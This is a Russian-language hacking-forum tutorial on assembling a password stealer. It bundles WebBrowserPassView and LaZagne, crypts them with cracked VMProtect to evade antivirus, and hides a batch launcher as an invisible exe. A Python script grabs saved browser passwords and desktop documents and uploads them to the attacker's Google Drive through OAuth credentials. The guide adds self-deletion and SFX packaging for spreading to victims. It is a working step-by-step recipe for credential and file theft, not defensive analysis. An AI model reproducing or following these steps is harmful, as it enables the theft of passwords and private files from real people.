Стиллер паролей с отправкой на Google Диск
DARK FORCE![](/file/5ff65939bbb9a7d44c327.png)
Стилер (от английского to steal, воровать) — определенный класс троянов (малвари, вирусов - как хотите), функционал которых полностью состоит из кражи сохраненных в системе паролей и отправка их "автору".
Стилер, пользуясь наивностью чукотских программистов, залазит в хранилища часто используемых программ и нагло тырит оттуда все логины, пароли и т.п. Следующий, он же последний этап работы программ данного класса — отправка вкусняшек злоумышленнику. Вот как-то так всё это и работает.
Из всего вышеописанного следует один громадный минус подобного софта: если пароли не сохранены, то парнишке-злодею стилер ничего не отправит.
Теперь о основных фичах стилеров. Чаще всего эти троянчеги воруют сохраненные пароли из браузеров (акки, банки и т.п.), FTP-клиентов и IM-клиентов (шестизнаки и т.п.). Отправка паролей может происходить в открытую - т.е. уже расшифрованные голые пароли передаются на гейт или еще куда, или же в зашифрованном виде. В идеале — в таком виде, чтобы никто кроме нашего парнишки не смог бы добраться до украденных паролей.
Логи (ну т.е. сразу пачка паролей от пользователя) в большинстве случаев отправляются на FTP-сервер, на гейт или на почту. А в нашем случае на Google Диск.
Возможности стилера:
- Запуск на нескольких компах одновременно (с Telegram ботом такое не прокатит)
- Стил паролей из firefox (webpassview не умеет этого делать) (Можно легко допилить стил на Chrome и т.д.)
- Стил документов с рабочего стола
- Отправка на google диск
- Самоудаление
- Безпалевность (проблемы могут быть только с есетом)
Итак, приступим!
Нам понадобится:
Python 3.6 прописанный в PATH
WebBrowserPassView с поддержкой командной строки: https://www.nirsoft.net/password_recovery_tools.html (нажимаем на "Click this download link")
laZagne: https://github.com/AlessandroZ/LaZagne/releases/ (Выбираем windows.zip)
Bat to exe converter: http://www.f2ko.de/downloads/Bat_To_Exe_Converter.zip
Криптор - VMProtect Professional 2.13.8 [Cracked]
Ход процесса:
1. Распаковываем архив и копируем файлы WebBrowserPassView.exe и laZagne.exe в разархивированную папку
2. Открываем WebBrowserPassView.exe в Resource hacker и удаляем все, кроме этих трех папок:
![](/file/25524138bfb5ce63c0408.png)
По желанию меняем Version info. Открываем laZagne.exe в Resource hacker и удаляем все папки.
3. Криптуем оба файла:
![](/file/1ce225d9ff71a32b9cd6e.png)
![](/file/24fa96b21cfc92af235b4.png)
4. Удаляем файлы xxx_original.exe и оригиналы файлов
5. Переименовываем файлы xxx.vmp.exe как вам захочется, но запоминаем названия
6. Если не нужно самоудаление, в файле run.bat удаляем последнюю строчку
7. Запускаем bat to exe converter и конвертируем run.bat с такими настройками (exe-format 32 bit | Windows (Invisible)):
![](/file/a42d4edeeba7b6364cb88.png)
Редактируем скрипты в папке py:
8. В командной строке от имени администратора пишем:
pip install --upgrade cx_Freeze
pip install --upgrade google-api-python-client
9. В файле app.py ищем строки:
extlist = [".doc", ".docx", ".txt", ".png", ".svg", ".jpg", ".jpeg"]
file1 = "cheatHelper.exe"
file2 = "steamConnect.exe"
Первая строка это расширения файлов, которые мы будем тырить с рабочего стола, вписываем что хотим
Вторая строка это название WebBrowserPassView.exe, вписываем свое
Третья строка это название laZagne.exe, вписываем свое
10. В папке py Shift + ПКМ по пустому месту -> открыть командную строку и пишем py setup.py build
11. Появляется папка build и в ней папка exe.win32-3.6. Копируем в нее файлы run.exe, ваши переименованные WebBrowserPassView.exe и laZagne.exe
Подключаем вирус к Google диску:
12. Переходим по ссылке: https://console.developers.google.com/flows/enableapi?apiid=drive и выбираем аккаунт, на который будут загружатся пароли
13. Выбираем да, да нажимаем "принять и продолжить"
![](/file/20e62b7fa69b42d3d2a92.png)
14. Нажимаем "создать учетные данные"
![](/file/d3fe9a0395ea15adc41d3.png)
15. Внизу жмем "Отмена"
![](/file/c1f79fff72932ddcc0269.png)
16. Переходим на вкладку "Окно запроса доступа OAuth"
![](/file/c3deac59f881a2bf177b9.png)
17. В название продукта вводим "File uploader", нажимаем "сохранить"
![](/file/0ba6342ee5d033f9803bb.png)
18. Нажимаем создать учетные данные -> Идентификатор клиента OAuth
![](/file/35b9c4a77dbf02645288f.png)
19. Выбираем другие типы, название File uploader, создать
![](/file/d306e162ab1494192b0e1.png)
20. Нажимаем ок, кликаем по названию File uploader, скачать файл json
![](/file/fd687e9f513477599c8f2.png)
21. Получаем файл client_secret_xxxxxx.json, переименовываем его в client_secret.json и кладем в папку exe.win32-3.6
22. Запускаем app.exe откроется страница, в ней выбираем тот же аккаунт, который настраивали ранее, нажимаем разрешить, после появления надписи
закрываем страницу (Ваши пароли и файлы с рабочего стола сразу же загрузятся на googlle диск, можете их от туда удалить)
23. Закрываем окно с app.exe и удаляем файл client_secret.json
Готово: можно запаковать в sfx архив с запуском run.exe
Пароли и файлы сохраняются в таком виде (не спрашивайте, почему так тупо):
![](/file/da45e273bc209768963e0.png)
В папке с паролями (data0.bin - пароли в текстовом виде из webpassview, data1.bin пароли из laZagne):
![](/file/7178e140921fdcf52763c.png)
При каждом запуске создается две папки New folder и папок по количеству папок на рабочем столе жертвы